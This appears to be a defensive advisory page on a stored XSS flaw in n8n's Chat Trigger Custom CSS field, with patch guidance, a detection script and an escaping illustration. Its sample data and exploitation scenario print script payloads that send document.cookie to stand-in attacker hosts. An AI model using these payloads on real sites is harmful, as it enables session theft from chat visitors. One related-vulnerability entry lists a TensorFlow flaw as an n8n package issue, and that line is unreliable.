Any n8n deployment older than the fixed versions that runs the Chat Trigger node (LangChain integration) with a public chat URL exposes its chat visitors to stored XSS: a user with legitimate workflow edit rights can place JavaScript in the node's Custom CSS field, and that script executes in the browser of every user who opens the chat. Patch to n8n 1.123.27, 2.13.3, or 2.14.1 immediately. If patching is blocked, restrict workflow edit permissions to fully trusted accounts only and disable the Chat Trigger node via the NODES_EXCLUDE environment variable.
What is the risk?
A CVSS 5.4 (Medium) rating understates the operational risk in AI-native environments. Scope:Changed (S:C) in the vector records the cross-boundary effect: the attacker plants the payload in the workflow configuration, but it detonates in every chat visitor's browser. Chat Trigger nodes typically front LLM-powered assistants wired to RAG backends, API credentials, and workflow execution context, so a script running in the chat origin can do whatever the visitor's browser is entitled to do there: read any cookies and storage that origin exposes to script, call back-end endpoints with the visitor's ambient credentials, and relay the assistant's responses and tool output to the attacker. Attack complexity is low once an account with workflow edit rights is compromised or abused; the required privilege (PR:L) is the only real gate. No active exploitation has been reported and the issue is not in CISA KEV.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | < 1.123.27 (1.x line) | 1.123.27 |
| n8n | npm | 2.x before 2.13.3 | 2.13.3 |
| n8n | npm | 2.14.0 | 2.14.1 |

The 2.x ranges are inferred from the fixed versions named in the advisory (2.13.3 and 2.14.1); the advisory itself lists only the fixed releases. Exposure requires a workflow containing a Chat Trigger node whose chat URL is reachable by the intended victims, but every unpatched instance that lets non-administrators edit workflows carries the flaw and should be treated as affected.
What should I do?
1. PATCH: Upgrade to n8n 1.123.27 (1.x line), 2.13.3, or 2.14.1 immediately; this is the only full remediation.
2. RESTRICT: If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC, and audit current role assignments now; every account that can save a workflow can plant this payload.
3. DISABLE NODE: Add @n8n/n8n-nodes-langchain.chatTrigger to NODES_EXCLUDE, which n8n parses as a JSON array of node type names (for example NODES_EXCLUDE='["@n8n/n8n-nodes-langchain.chatTrigger"]'), then restart n8n. Expect existing workflows that use the node to stop functioning while the exclusion is in place.
4. AUDIT: Export workflows (n8n export:workflow --all --output=<dir>) or query the workflow store directly, and search the Custom CSS fields of Chat Trigger nodes for <script, </style, javascript:, on*= event handlers, or base64 blobs. Any < or > in a CSS field deserves a look, since legitimate CSS rarely needs them outside string literals.
5. ROTATE: After patching, remove injected CSS from affected workflows, invalidate active chat sessions, and rotate any session cookies a chat visitor's browser could have exposed (including n8n user sessions if the chat page shares the editor's origin).
6. MONITOR: Alert on workflow save events that modify Chat Trigger CSS fields after the patch, and run the new value through the same indicator checks as the audit, to detect residual or re-injected payloads.
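The AUDIT and MONITOR steps above share one check: walk a workflow definition, find Chat Trigger nodes, and flag Custom CSS values that contain markup or script indicators. The script below is an added example written for this page, not n8n's own code. It assumes (the page does not say) that the CSS is stored as a string parameter whose key contains "css", matched case-insensitively at any depth under node.parameters, and that an export is either a single workflow object or an array of them; the sample export it scans is constructed for the demo.

```javascript
// Added example (not n8n's code): scan n8n workflow exports for Chat Trigger
// nodes whose Custom CSS carries markup or script indicators (AUDIT step), and
// reuse the same check on workflow-save events (MONITOR step).
//
// Assumptions not stated on the page: the CSS is stored as a string parameter
// whose key contains "css" (matched case-insensitively, at any depth under
// node.parameters), and an export is either one workflow object or an array of
// them. SAMPLE_EXPORT below is constructed for this demo.

const CHAT_TRIGGER_TYPE = "@n8n/n8n-nodes-langchain.chatTrigger"; // named in the advisory

// Indicators from the AUDIT step plus the break-out sequences that matter when
// untrusted text lands inside a <style> element. Heuristic, not a parser.
const INDICATORS = [
  { name: "script-tag",     re: /<\s*script\b/i },
  { name: "style-breakout", re: /<\s*\/\s*style\b/i },
  { name: "html-tag",       re: /<\s*[a-z!\/]/i },
  { name: "javascript-uri", re: /javascript\s*:/i },
  { name: "event-handler",  re: /\bon[a-z]+\s*=/i },
  { name: "data-uri",       re: /data\s*:[^,]*;base64/i },
  { name: "base64-blob",    re: /[A-Za-z0-9+\/]{40,}={0,2}/ },   // long opaque runs
  { name: "css-expression", re: /expression\s*\(/i },            // legacy IE script-in-CSS
];

function indicatorsFor(text) {
  return INDICATORS.filter(({ re }) => re.test(text)).map(({ name }) => name);
}

// Yield [path, value] for every string under a key that looks like a CSS field.
function* cssStrings(value, path = "parameters") {
  if (value === null || typeof value !== "object") return;
  for (const [key, child] of Object.entries(value)) {
    const childPath = `${path}.${key}`;
    if (typeof child === "string") {
      if (/css/i.test(key)) yield [childPath, child];
    } else {
      yield* cssStrings(child, childPath);
    }
  }
}

// Report every Chat Trigger CSS field in one workflow that trips an indicator.
function scanWorkflow(workflow) {
  const findings = [];
  for (const node of workflow.nodes ?? []) {
    if (node.type !== CHAT_TRIGGER_TYPE) continue;
    for (const [path, text] of cssStrings(node.parameters ?? {})) {
      const hits = indicatorsFor(text);
      if (hits.length > 0) {
        findings.push({ workflow: workflow.name, node: node.name, path, hits });
      }
    }
  }
  return findings;
}

// Accepts the raw JSON text of an export (one workflow or an array of them).
function scanExport(jsonText) {
  const parsed = JSON.parse(jsonText);
  const workflows = Array.isArray(parsed) ? parsed : [parsed];
  return workflows.flatMap(scanWorkflow);
}

// Constructed sample export: one clean chat workflow, one backdoored one.
const SAMPLE_EXPORT = [
  {
    name: "Support bot (clean)",
    nodes: [{
      name: "Chat Trigger",
      type: CHAT_TRIGGER_TYPE,
      parameters: { public: true, options: {
        customCss: ".chat-window { color: #333; font-family: Inter, sans-serif; }" } },
    }],
  },
  {
    name: "Support bot (backdoored)",
    nodes: [{
      name: "Chat Trigger",
      type: CHAT_TRIGGER_TYPE,
      parameters: { public: true, options: {
        customCss: ".chat-window{}</style><script>fetch('https://c2.attacker.example/x?t='+document.cookie)</script>" } },
    }],
  },
];

console.log(JSON.stringify(scanExport(JSON.stringify(SAMPLE_EXPORT)), null, 2));
```

Feed the text of a real export to scanExport; a workflow-save hook can call scanWorkflow on the saved definition and page when it returns anything. The "html-tag" indicator is deliberately broad: a legitimate stylesheet has no reason to contain "<" outside a string literal, so reviewing its few false positives is cheaper than missing an obfuscated tag.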
Frequently Asked Questions
What is GHSA-3c7f-5hgj-h279?
GHSA-3c7f-5hgj-h279 is a stored cross-site scripting vulnerability (CWE-79) in n8n's Chat Trigger node (LangChain integration). An authenticated user with permission to create or modify workflows can inject JavaScript through the node's Custom CSS field; a misconfiguration of the sanitize-html library let the payload through, so it executes in the browser of anyone who opens the public chat URL. It is fixed in n8n 1.123.27, 2.13.3, and 2.14.1.
Is GHSA-3c7f-5hgj-h279 actively exploited?
No confirmed active exploitation of GHSA-3c7f-5hgj-h279 has been reported, but organizations should still patch proactively.
How to fix GHSA-3c7f-5hgj-h279?
Upgrade to n8n 1.123.27 (1.x line), 2.13.3, or 2.14.1; that is the only full fix. Until the upgrade lands, restrict workflow edit rights to trusted users, exclude @n8n/n8n-nodes-langchain.chatTrigger through NODES_EXCLUDE, audit existing Chat Trigger Custom CSS fields for markup, invalidate chat sessions once patched, and alert on later edits to those fields. The six steps are spelled out under "What should I do?" above.
What systems are affected by GHSA-3c7f-5hgj-h279?
n8n instances before 1.123.27 (1.x line), 2.13.3, or 2.14.1 that run the Chat Trigger node (LangChain integration) with a public chat URL. In architectural terms this covers the patterns the page tags: agent frameworks, workflow automation, LangChain integrations, public-facing chat interfaces, and LLM API proxies built on n8n.
What is the CVSS score for GHSA-3c7f-5hgj-h279?
GHSA-3c7f-5hgj-h279 has a CVSS v3.1 base score of 5.4 (MEDIUM).
What is the AI security impact?
MITRE ATLAS Techniques
- AML.T0011 User Execution
- AML.T0012 Valid Accounts
- AML.T0049 Exploit Public-Facing Application
- AML.T0053 AI Agent Tool Invocation
- AML.T0078 Drive-by Compromise
- AML.T0080 AI Agent Context Poisoning
What are the technical details?
Original Advisory
## Impact

An authenticated user with permission to create or modify workflows could inject malicious JavaScript into the Custom CSS field of the Chat Trigger node. Due to a misconfiguration in the `sanitize-html` library, the sanitization could be bypassed, resulting in stored XSS on the public chat page. Any user visiting the chat URL would be affected.

## Patches

The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability.

## Workarounds

If upgrading is not immediately possible, administrators should consider the following temporary mitigations:

- Limit workflow creation and editing permissions to fully trusted users only.
- Disable the Chat Trigger node by adding `@n8n/n8n-nodes-langchain.chatTrigger` to the `NODES_EXCLUDE` environment variable.

These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A threat actor with legitimate (or compromised) workflow editor credentials opens an n8n workflow containing a Chat Trigger node and places a payload such as <script>fetch('https://c2.attacker.com/x?t='+document.cookie)</script> in the Custom CSS field. The sanitize-html misconfiguration fails to strip the tag, the workflow is saved and published, and the payload now lives in the persistent workflow configuration. Anyone who opens the public chat URL (a customer service agent, an external user, a headless integration with a browser engine) executes the script, which runs with the privileges of the chat origin: it can read whatever cookies and storage that origin exposes to script and issue requests carrying the victim's ambient credentials. Where the chat page shares an origin with the n8n editor, or where visitors are authenticated to a downstream service the chat proxies (LLM API, RAG knowledge base, CRM integration), the attacker can use the captured session or drive the victim's browser to reach those systems. Because the payload sits in a saved workflow rather than in memory, it survives restarts and keeps firing until the field is cleaned and the instance patched.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: HTML body; element attributes (such as src="XYZ"); URIs; JavaScript sections; Cascading Style Sheets and style property; etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Source: MITRE CWE corpus.
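The CWE guidance above on context-specific encoding is exactly what a "Custom CSS" feature needs: CSS placed inside a style element is raw text to the HTML parser until the first "</style", so one unescaped "<" is enough to leave the CSS context and re-enter markup. The snippet below is an added illustration of that failure class and its fix; the page does not describe n8n's actual rendering path or the specific sanitize-html misconfiguration, so none of this is n8n's code. The functions renderUnsafe, renderSafe, escapeCssForStyleElement and countScriptsAfterStyle are names chosen for this example, and the payload is constructed.

```javascript
// Added illustration of CWE-79 in a <style> context; not n8n's code and not a
// description of n8n's actual bug. Names below are chosen for this example.

// Vulnerable pattern: user-supplied CSS concatenated straight into a <style>
// element. The HTML parser treats the element's content as raw text only up to
// the first "</style" sequence, so a value containing "</style>" closes the
// element and everything after it is parsed as markup again.
function renderUnsafe(userCss) {
  return `<style>${userCss}</style>`;
}

// Context-aware encoding for the style element: the only character that can
// end the raw-text context is "<", so replace each one with the CSS hex escape
// "\3c " (the trailing space terminates the escape). Inside CSS strings this
// still decodes to "<", so a legitimate `content: "<"` keeps working, while the
// serialized HTML contains no "<" for the HTML parser to act on.
function escapeCssForStyleElement(userCss) {
  return String(userCss).replace(/</g, "\\3c ");
}

function renderSafe(userCss) {
  return `<style>${escapeCssForStyleElement(userCss)}</style>`;
}

// Minimal model of the parser's raw-text rule: find the first "</style" after
// the opening tag and count <script tags that appear from there on, i.e. the
// tags a browser would actually execute.
function countScriptsAfterStyle(html) {
  const open = html.indexOf("<style>");
  if (open === -1) return 0;
  const close = html.toLowerCase().indexOf("</style", open + "<style>".length);
  const rest = close === -1 ? "" : html.slice(close);
  return (rest.match(/<script\b/gi) || []).length;
}

// Constructed payload in the shape the advisory describes: CSS that breaks out
// of the style element and drops a script tag.
const PAYLOAD = ".chat{}</style><script>alert(1)</script>";

console.log("unsafe:", countScriptsAfterStyle(renderUnsafe(PAYLOAD)), "script tag(s) reach the parser");
console.log("safe:  ", countScriptsAfterStyle(renderSafe(PAYLOAD)), "script tag(s) reach the parser");
console.log(renderSafe(PAYLOAD));
```

Escaping "<" only stops the break-out into markup. CSS on its own can still leak data (attribute selectors paired with url() fetches are the classic example), so a Custom CSS feature also wants a Content Security Policy that restricts where stylesheets may load from, or an allowlist of permitted properties, on top of the encoding.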
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Read: reachable over the network with low attack complexity; requires low privileges (an authenticated workflow editor) and user interaction (a visitor opening the chat); scope changes because the payload authored in n8n executes in the visitor's browser; low confidentiality and integrity impact, no availability impact. The vector yields the 5.4 base score quoted above.
Related Vulnerabilities
- CVE-2026-33663 (10.0) n8n: member role steals plaintext HTTP credentials (same package: n8n)
- CVE-2026-33660 (10.0) TensorFlow: type confusion NPD in tensor conversion (same package: n8n)
- CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation (same package: n8n)
- CVE-2026-27577 (9.9) n8n: Code Injection enables RCE (same package: n8n)
- CVE-2026-27494 (9.9) n8n: security flaw enables exploitation (same package: n8n)